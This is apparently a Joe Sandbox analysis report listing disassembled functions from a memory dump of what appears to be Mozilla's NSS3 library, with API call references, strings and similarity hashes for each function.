Function 6C779C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7911C0: PR_NewLock.NSS3 ref: 6C791216

free.MOZGLUE(?), ref: 6C779E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C779E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C779E4E
TlsGetValue.KERNEL32 ref: 6C779EA2

Part of subcall function 6C789500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C789546

EnterCriticalSection.KERNEL32(?), ref: 6C779EB6
PR_Unlock.NSS3 ref: 6C779ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C779F18

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 3d8c5e1e104f72e615985f9342422e9cffdfdbe9b1cbca87b9dc49d8fa294857
Instruction ID: bbb1310bfc1d17f9e269099103b60ecb73eba26a22c876b1ddaaf82d88c961c3
Opcode Fuzzy Hash: 3d8c5e1e104f72e615985f9342422e9cffdfdbe9b1cbca87b9dc49d8fa294857
Instruction Fuzzy Hash: 8C813B71A02205ABEF209F34DE49AAB77A9BF6524CF044538EC4983B41FB31E914C7E1

Function 6C78DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C78AB10: DeleteCriticalSection.KERNEL32(D958E852,6C791397,5B5F5EC0,?,?,6C78B1EE,2404110F,?,?), ref: 6C78AB3C
Part of subcall function 6C78AB10: free.MOZGLUE(D958E836,?,6C78B1EE,2404110F,?,?), ref: 6C78AB49
Part of subcall function 6C78AB10: DeleteCriticalSection.KERNEL32(5D5E6C98), ref: 6C78AB5C
Part of subcall function 6C78AB10: free.MOZGLUE(5D5E6C8C), ref: 6C78AB63
Part of subcall function 6C78AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C78AB6F
Part of subcall function 6C78AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C78AB76

TlsGetValue.KERNEL32 ref: 6C78DCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C78DD0E
PK11_IsFriendly.NSS3(?), ref: 6C78DD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C78DD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C78DE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C78DEA6
PR_Unlock.NSS3(?), ref: 6C78DF08

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: 603a588ec6f715097f04ecc58e6e01d978f8b7c5f5b4b1eaa4d19c0a5c8f83ff
Instruction ID: 06b8fb625a310851cdd4e907ed85a7e17a6a844970b2600efe95e57b22e710e8
Opcode Fuzzy Hash: 603a588ec6f715097f04ecc58e6e01d978f8b7c5f5b4b1eaa4d19c0a5c8f83ff
Instruction Fuzzy Hash: BF91E6B5A021069FDB00CF68CA85BAAB7B5BF64308F144036DE199BB41E731E945CBE5

Function 6C745FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C82BB62,00000004,6C894CA4,?,?,00000000,?,?,6C7031DB), ref: 6C7460AB
sqlite3_config.NSS3(00000004,6C894CA4,6C82BB62,00000004,6C894CA4,?,?,00000000,?,?,6C7031DB), ref: 6C7460EB
sqlite3_config.NSS3(00000012,6C894CC4,?,?,6C82BB62,00000004,6C894CA4,?,?,00000000,?,?,6C7031DB), ref: 6C746122

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C746095
%s at line %d of [%.10s], xrefs: 6C7460A4
misuse, xrefs: 6C74609F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: 48ebb61049169f6b82983259a279803b83b453f994c604c6e3a1a2790eabc563
Instruction ID: 73ba9c1bca4f5b14c1596016759d4248c6e28028cec08781d16cbf176bdd1515
Opcode Fuzzy Hash: 48ebb61049169f6b82983259a279803b83b453f994c604c6e3a1a2790eabc563
Instruction Fuzzy Hash: 88B141B4E0464ACFCB14CF5CC2819A9B7F0FB1E309B059569D509AB362E730AB84CBD5

Function 6C6F4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6F4FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F51BB

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6F51A5
unable to delete/modify user-function due to active statements, xrefs: 6C6F51DF
%s at line %d of [%.10s], xrefs: 6C6F51B4
misuse, xrefs: 6C6F51AF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 7c84daee9e81994c49f628402ca03ef4be8d484ff924db1a37e4b8f63b273c61
Instruction ID: 49d7c72dfc9d13bdde6744f5a04f74290b06a859542613cf041ad8bc7b1b9933
Opcode Fuzzy Hash: 7c84daee9e81994c49f628402ca03ef4be8d484ff924db1a37e4b8f63b273c61
Instruction Fuzzy Hash: 0471B07160420A9FEB00CE59CD80BDA77B6BF49308F048524FD299BB45D331ED56CBA5

Function 6C762D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C762D69

Strings

winUnmapfile2, xrefs: 6C762F7F
winSeekFile, xrefs: 6C762E9C
winTruncate2, xrefs: 6C762EF8
winUnmapfile1, xrefs: 6C762F55
winTruncate1, xrefs: 6C762EBE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 73c4dac5bfeb3272946767cfb387503c4e9e64ab2690ee3b378d90262b0d83e1
Instruction ID: 5a92f42ef84a98eb149c6d8add044efdcb27f37ef59d5b7cc9230f87d748005e
Opcode Fuzzy Hash: 73c4dac5bfeb3272946767cfb387503c4e9e64ab2690ee3b378d90262b0d83e1
Instruction Fuzzy Hash: 7261B171B002059FDB54CF69D988AAA77B1FF89318F10853CED159BB80DB30AD06CB91

Function 6C7DFF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C7DF165,?), ref: 6C7DFF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C7DF165,?), ref: 6C7DFF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C7DF165,?), ref: 6C7DFF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C7DF165,?), ref: 6C7DFF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C7DF165,?), ref: 6C7DFFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C7DF165,6C8A219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7DFFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C7DF165,?), ref: 6C7E00A6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: 52c27cf9010ea13dc4794dc884c0cf8253c92c910b6e92e0af7d7d075e096899
Instruction ID: 85e42b9fc7f03e7ae211944a432f610f34bf3a68c3c22aed85e175e1838b9403
Opcode Fuzzy Hash: 52c27cf9010ea13dc4794dc884c0cf8253c92c910b6e92e0af7d7d075e096899
Instruction Fuzzy Hash: 3C51E472E002559FDB208E99CA807AEB7B5FB49318F654139DD55A7B40D731BD00CBD1

Function 6C79DEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C79DF37
EnterCriticalSection.KERNEL32(?), ref: 6C79DF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79DF96
PR_SetError.NSS3(00000000,00000000), ref: 6C79E02B
PR_Unlock.NSS3(?), ref: 6C79E07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C79E090
PR_Unlock.NSS3(?), ref: 6C79E0AF

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 7d71858edcdaba06cd5cdd2ea4d2701623a23cff7f2d1f06d8c077816c17b9da
Instruction ID: 7d4f518b2526a16ce85776a3482f358841858b370ae40c60c729981906967538
Opcode Fuzzy Hash: 7d71858edcdaba06cd5cdd2ea4d2701623a23cff7f2d1f06d8c077816c17b9da
Instruction Fuzzy Hash: 0C51A0356006049FDB209F28EA49B6673B5FF54318F204939E86A47F91E735E948CBD2

Function 6C79BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C79BD1E

Part of subcall function 6C772F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C772F0A
Part of subcall function 6C772F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C772F1D

Part of subcall function 6C7B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C77B41E,00000000,00000000,?,00000000,?,6C77B41E,00000000,00000000,00000001,?), ref: 6C7B57E0
Part of subcall function 6C7B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C7B5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C79BD8C

Part of subcall function 6C7CFAB0: free.MOZGLUE(?,-00000001,?,?,6C76F673,00000000,00000000), ref: 6C7CFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C79BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C79BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79BE3A

Part of subcall function 6C773E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C773EC2
Part of subcall function 6C773E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C773ED6
Part of subcall function 6C773E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C773EEE
Part of subcall function 6C773E60: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C773F02
Part of subcall function 6C773E60: PL_FreeArenaPool.NSS3 ref: 6C773F14
Part of subcall function 6C773E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C773F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C79BE52

Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E
Part of subcall function 6C772E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33
Part of subcall function 6C772E00: TlsGetValue.KERNEL32 ref: 6C772E4E
Part of subcall function 6C772E00: EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
Part of subcall function 6C772E00: PL_HashTableLookup.NSS3(?), ref: 6C772E71
Part of subcall function 6C772E00: PL_HashTableRemove.NSS3(?), ref: 6C772E84
Part of subcall function 6C772E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
Part of subcall function 6C772E00: PR_Unlock.NSS3 ref: 6C772EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C79BE61

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 3f740ecb2970c8500f290e4069df2e1bb922fb7250adad0e70dfc378951ba25b
Instruction ID: ec8a8a6e7d96a5eae8b5b305f5ff9e5fa04dd3ebf0693eaa1ba9d970c215697b
Opcode Fuzzy Hash: 3f740ecb2970c8500f290e4069df2e1bb922fb7250adad0e70dfc378951ba25b
Instruction Fuzzy Hash: B741F6B5A002109FCB20CF28EE89A6A77E8FF49718F104168F90997711E731ED04CBA2

Function 6C7BAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC35

Part of subcall function 6C79CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C79CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C7BAB3E,?,?,?), ref: 6C7BAC55

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E,?,?), ref: 6C7BAC70

Part of subcall function 6C79E300: TlsGetValue.KERNEL32 ref: 6C79E33C
Part of subcall function 6C79E300: EnterCriticalSection.KERNEL32(?), ref: 6C79E350
Part of subcall function 6C79E300: PR_Unlock.NSS3(?), ref: 6C79E5BC
Part of subcall function 6C79E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C79E5CA
Part of subcall function 6C79E300: TlsGetValue.KERNEL32 ref: 6C79E5F2
Part of subcall function 6C79E300: EnterCriticalSection.KERNEL32(?), ref: 6C79E606
Part of subcall function 6C79E300: PORT_Alloc_Util.NSS3(?), ref: 6C79E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C7BAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C7BAB3E), ref: 6C7BACD7
PORT_Alloc_Util.NSS3(?), ref: 6C7BAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C7BAD2B

Part of subcall function 6C79F360: TlsGetValue.KERNEL32(00000000,?,6C7BA904,?), ref: 6C79F38B
Part of subcall function 6C79F360: EnterCriticalSection.KERNEL32(?,?,?,6C7BA904,?), ref: 6C79F3A0
Part of subcall function 6C79F360: PR_Unlock.NSS3(?,?,?,?,6C7BA904,?), ref: 6C79F3D3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 8871a50d3e0623bad1c21d46d8cefd0280fc8b040e5a0a770a413914632d8285
Instruction ID: 75763f1e896428b55189167cf03b12e3c40a70d69ccbae5bc35ce2a8440c3234
Opcode Fuzzy Hash: 8871a50d3e0623bad1c21d46d8cefd0280fc8b040e5a0a770a413914632d8285
Instruction Fuzzy Hash: 6E3129B1E006055FEB00AF69DE459AF7776AF84328B198138E8156B741EB31ED0587A1

Function 6C798C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C798C7C

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C798CB0
TlsGetValue.KERNEL32 ref: 6C798CD1
EnterCriticalSection.KERNEL32(?), ref: 6C798CE5
PR_Unlock.NSS3(?), ref: 6C798D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C798D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C798D93

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: a09e1d47aac0acbf48103f2a95008c7275061bdd1559db8309800eb0f3ff916e
Instruction ID: 76c7503d2d4712bcdab489a2ad3acf06ea938367a9810c266db842fc3984b6ef
Opcode Fuzzy Hash: a09e1d47aac0acbf48103f2a95008c7275061bdd1559db8309800eb0f3ff916e
Instruction Fuzzy Hash: 39316A71A01201AFDB109F68EE4579AB7B0BF59318F24013AEA1967F60D731B924C7C1

Function 6C7D9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C7D9C5B), ref: 6C7D9D82

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C7D9C5B), ref: 6C7D9DA9

Part of subcall function 6C7D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D136A
Part of subcall function 6C7D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D137E
Part of subcall function 6C7D1340: PL_ArenaGrow.NSS3(?,6C76F599,?,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?), ref: 6C7D13CF
Part of subcall function 6C7D1340: PR_Unlock.NSS3(?,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C7D9C5B), ref: 6C7D9DCE

Part of subcall function 6C7D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D13F0
Part of subcall function 6C7D1340: PL_ArenaGrow.NSS3(?,6C76F599,?,?,?,00000000,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C7D1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C7D9C5B), ref: 6C7D9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C7D9C5B), ref: 6C7D9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C7D9C5B), ref: 6C7D9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C7D9C5B), ref: 6C7D9E91

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Part of subcall function 6C7D1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C7CFAAB,00000000), ref: 6C7D157E
Part of subcall function 6C7D1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C7CFAAB,00000000), ref: 6C7D1592
Part of subcall function 6C7D1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C7D1600
Part of subcall function 6C7D1560: PL_ArenaRelease.NSS3(?,?), ref: 6C7D1620
Part of subcall function 6C7D1560: PR_Unlock.NSS3(?), ref: 6C7D1639

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
